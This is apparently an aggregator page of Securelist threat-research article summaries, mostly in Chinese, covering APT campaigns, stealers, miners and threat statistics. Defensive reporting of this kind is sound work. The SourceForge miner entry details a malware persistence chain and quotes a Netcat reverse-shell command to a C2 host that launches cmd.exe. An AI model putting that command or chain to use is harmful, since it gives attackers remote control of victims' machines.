Streamlining detection engineering in security operation centers 文章探讨了安全运营中心（SOC）在网络安全中的作用，重点分析了SIEM系统在日志收集、威胁检测、分类与调查及响应四个阶段中的常见问题与挑战，并提出了通过建立专门的检测工程团队、优化流程与工具以及实施最佳实践来提升威胁检测能力的有效方法。... 2025-4-16 10:0:15 | 阅读: 7 | 收藏 | Securelist - securelist.com security threats detections metric triage

GOFFEE continues to attack organizations in Russia 文章描述了威胁行为者GOFFEE针对俄罗斯实体的网络攻击活动，利用鱼叉式网络钓鱼邮件和恶意附件进行初始感染。攻击中使用了多种恶意软件工具，包括PowerTaskel、PowerModul和USB Worm，并通过WinRM服务进行横向移动。GOFFEE在2024年引入了新的植入工具PowerModul，并逐渐转向使用二进制Mythic代理进行内部传播。... 2025-4-10 10:0:12 | 阅读: 11 | 收藏 | Securelist - securelist.com powershell powertaskel powermodul mythic malicious

Attackers distributing a miner and the ClipBanker Trojan via SourceForge 攻击者利用SourceForge平台分发恶意软件，在看似合法的项目页面中嵌入恶意链接和下载按钮。用户点击后会被重定向至伪装页面下载伪装成Office工具的恶意压缩包vinstaller.zip。该压缩包内含加密文件installer.zip及密码提示文档Readme.txt。解压后运行installer.msi会执行嵌入式VB脚本并下载批处理脚本confvk从GitHub获取RAR密码解压恶意档案。 解压后的档案包含AutoIt解释器Input.exe及两个动态链接库Icon.dll和Kape.dll（均含压缩AutoIt脚本），以及Netcat网络工具ShellExperienceHost.exe及其依赖项libssl-1_1.dll、libcrypto-1_1.dll、vcruntime140.dll。 confvk批处理脚本执行以下操作： 1. 检测系统中是否已存在感染迹象（如AutoIt解释器路径）； 2. 检查是否存在安全软件、虚拟环境或研究工具进程； 3. 若未检测到威胁，则继续执行； 4. 解压RAR档案并运行两个PowerShell脚本： - 第一个PowerShell脚本通过Telegram API发送感染设备信息； - 第二个PowerShell脚本下载并执行另一个批处理脚本confvz。 confvz批处理脚本进一步完成以下步骤： 1. 在%ProgramData%目录下创建三个子目录，并将解压出的文件分别移动至相应目录； 2. 在%USERPROFILE%\Cookies目录下创建ini.cmd和init.cmd批处理脚本； 3. 在注册表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths下创建键值以关联这些批处理脚本； 4. 创建三个服务NetworkConfiguration、PerformanceMonitor和Update以实现自启动功能； 5. 作为备用启动方法，在注册表中添加键值以在MicrosoftEdgeUpdate.exe启动时触发cmd.exe执行start.exe； 6. 使用WMIC创建事件过滤器以每80秒触发一次handler命令：ShellExperienceHost.exe --ssl apap.app 445 -e cmd.exe（即通过Netcat建立与C2服务器apap.app:445的加密连接并启动cmd.exe）； 7. 创建ErrorHandler.cmd文件，并通过WMIC设置每300秒触发一次cmd.exe执行Setup.exe（该Setup.exe实际指向%WINDIR%\System32\oobe\Setup.exe），从而间接执行ErrorHandler.cmd中的PowerShell脚本以通过Telegram API获取并执行远程指令。 最终目标是运行两个AutoIt脚本： - Icon.dll重新启动AutoIt解释器并注入矿工软件； - Kape.dll同样重启AutoIt解释器但注入ClipBanker恶意软件（用于劫持剪贴板中的加密货币钱包地址）。 受害者统计显示90%潜在受害者位于俄罗斯地区（共4,604名用户在2023年1月至3月期间遭遇此攻击）。... 2025-4-8 10:0:25 | 阅读: 9 | 收藏 | Securelist - securelist.com sourceforge software autoit attackers

How ToddyCat tried to hide behind AV software ToddyCat APT组织利用恶意工具TCESB通过DLL代理技术绕过安全防护，在ESET扫描器中利用CVE-2024-11859漏洞加载恶意DLL，并使用BYOVD技术安装易受攻击的驱动程序以提升权限。... 2025-4-7 10:0:44 | 阅读: 9 | 收藏 | Securelist - securelist.com tcesb malicious payload eset library

A journey into forgotten Null Session and MS-RPC interfaces, part 2 文章探讨了Windows中无认证枚举域信息的问题及其原因，并通过逆向工程分析MS-RPC安全机制和WMI的工作原理。研究揭示组策略限制无认证访问的局限性，并提供检测方法如使用RPC-Firewall工具。... 2025-4-4 10:0:38 | 阅读: 6 | 收藏 | Securelist - securelist.com security client remote nrpc

TookPS: DeepSeek isn’t the only game in town 文章揭示了一起利用DeepSeek LLM作为诱饵的大规模网络攻击活动。攻击者分发伪装成流行软件的恶意程序TookPS，在受害者设备上建立SSH隧道并植入后门程序以获取完全控制权。建议用户避免从不可信来源下载软件，并加强安全意识培训。... 2025-4-2 10:0:5 | 阅读: 8 | 收藏 | Securelist - securelist.com software malicious powershell attackers c2

Operation ForumTroll: APT attack with Google Chrome zero-day exploit chain 2025年3月中旬，卡巴斯基发现一种新型复杂恶意软件通过钓鱼邮件传播，在受害者使用Google Chrome打开链接后立即感染。该恶意软件利用零日漏洞绕过Chrome沙盒保护，并针对俄罗斯媒体、教育和政府机构发起间谍活动。卡巴斯基迅速分析并报告漏洞，谷歌于3月25日发布补丁修复问题。... 2025-3-25 21:30:22 | 阅读: 42 | 收藏 | Securelist - securelist.com chrome malicious attackers trojan dubbed

Financial cyberthreats in 2024 文章指出2024年金融网络威胁持续增长，钓鱼攻击占主导地位，银行和亚马逊是最常见诱饵。加密货币相关钓鱼攻击激增83%。PC端银行木马用户数下降至19.9万，而移动端增长至24.8万，Mamont木马在土耳其尤为活跃。... 2025-3-25 08:0:33 | 阅读: 45 | 收藏 | Securelist - securelist.com phishing trojan banker security download

Threat landscape for industrial automation systems in Q4 2024 2024年第四季度工业控制系统（ICS）计算机恶意软件阻断率为21.9%，较第三季度下降0.1个百分点。非洲地区阻断率最高（31%），北欧最低（10.6%）。生物识别行业阻断率最高，建筑行业例外上升。主要威胁来自互联网、邮件和移动存储设备。恶意文档和拒绝列表资源减少，但间谍软件和勒索软件增加。自传播恶意软件略有上升。... 2025-3-21 10:0:29 | 阅读: 15 | 收藏 | Securelist - securelist.com malicious pp q4 decreased quarter

Arcane stealer: We want all your data 文章描述了一种名为Arcane的新恶意软件，通过YouTube上的游戏作弊视频传播。该软件窃取VPN、游戏客户端、网络工具等应用程序的数据，并收集系统信息。攻击者利用此工具绕过安全防护。... 2025-3-19 10:15:18 | 阅读: 9 | 收藏 | Over Security - Cybersecurity news aggregator - securelist.com arcane stealer cheats loader

Head Mare and Twelve join forces to attack Russian entities 2024年9月，黑客组织Head Mare与Twelve协作攻击俄罗斯公司，利用CobInt后门及钓鱼邮件等手段获取初始访问权限，并横向移动至关键系统。他们通过共享C2服务器和脚本实现数据窃取与加密勒索，主要针对制造业、政府及能源行业。... 2025-3-13 10:0:33 | 阅读: 34 | 收藏 | Securelist - securelist.com windows mare attackers username twelve

Incident response analyst report 2024 Kaspersky 2024事件响应报告显示勒索软件攻击增加8.3个百分点，LockBit家族占主导地位。Mimikatz和PsExec工具被广泛用于后渗透阶段。数据泄露成为第二大请求原因。报告建议实施强密码策略、多因素认证及员工安全意识培训等措施以应对威胁。... 2025-3-12 08:0:21 | 阅读: 59 | 收藏 | Securelist - securelist.com security ransomware gert tendency

DCRat backdoor returns Research... 2025-3-11 10:0:13 | 阅读: 32 | 收藏 | Securelist - securelist.com dcrat c2 software attackers dubbed

SideWinder targets the maritime and nuclear sectors with an updated toolset SideWinder是一个活跃的APT组织，主要针对军事、政府及物流、海运等关键基础设施实施网络攻击。该组织利用旧漏洞CVE-2017-11882通过鱼叉式钓鱼传播恶意软件，并持续更新工具以规避检测。其攻击范围扩展至非洲等地，并对核能等关键领域构成威胁。... 2025-3-10 10:15:13 | 阅读: 38 | 收藏 | Over Security - Cybersecurity news aggregator - securelist.com loader security malicious attacker maritime

Trojans disguised as AI: Cybercriminals exploit DeepSeek’s popularity DeepSeek-R1发布后迅速流行,吸引了网络犯罪分子创建假冒网站分发恶意软件,窃取用户数据,甚至控制设备。部分攻击针对中文用户,伪装成AI客户端诱导下载。专家提醒用户谨慎访问来源不明的链接,避免泄露个人信息和设备被控风险。... 2025-3-6 10:0:4 | 阅读: 17 | 收藏 | Securelist - securelist.com deepseek malicious client python victim

Undercover miner: how YouTubers get pressed into distributing SilentCryptoMiner as a restriction bypass tool In recent months, we’ve seen an increase in the use of Windows Packet Divert drivers t... 2025-3-5 10:0:38 | 阅读: 23 | 收藏 | Securelist - securelist.com malicious miner loader youtube strikes

Mobile malware evolution in 2024 2024年Kaspersky统计显示，全球共阻止3330万次恶意软件、广告软件等攻击，其中广告软件占35%。新型恶意软件如Mamont银行木马和NFC诈骗技术出现，部分恶意程序通过Google Play等官方应用商店传播。... 2025-3-3 10:0:49 | 阅读: 21 | 收藏 | Securelist - securelist.com trojan banker turkey triada unwanted

The SOC files: Chasing the web shell Web shells have evolved far beyond their original purpose of basic remote command exec... 2025-2-28 04:0:11 | 阅读: 36 | 收藏 | Securelist - securelist.com memory 7e attackers analysis

Exploits and vulnerabilities in Q4 2024 2024年第四季度漏洞数量增加但公开 exploits 减少，攻击者利用未记录 RPC 接口和 Windows 认证机制。微软 Office 和 WinRAR 漏洞突出，Linux 系统需关注内核组件更新。... 2025-2-26 10:0:8 | 阅读: 22 | 收藏 | Securelist - securelist.com q4 software windows improper

The GitVenom campaign: cryptocurrency theft using GitHub GitVenom活动通过在GitHub上创建伪装成合法项目的恶意仓库来诱骗开发者下载并执行恶意代码。这些项目包含虚假功能描述和恶意脚本，旨在窃取敏感信息、控制设备或劫持加密货币交易。该活动已持续数年，并在全球范围内对开发者构成威胁。... 2025-2-24 09:26:58 | 阅读: 18 | 收藏 | Securelist - securelist.com malicious attackers github gitvenom python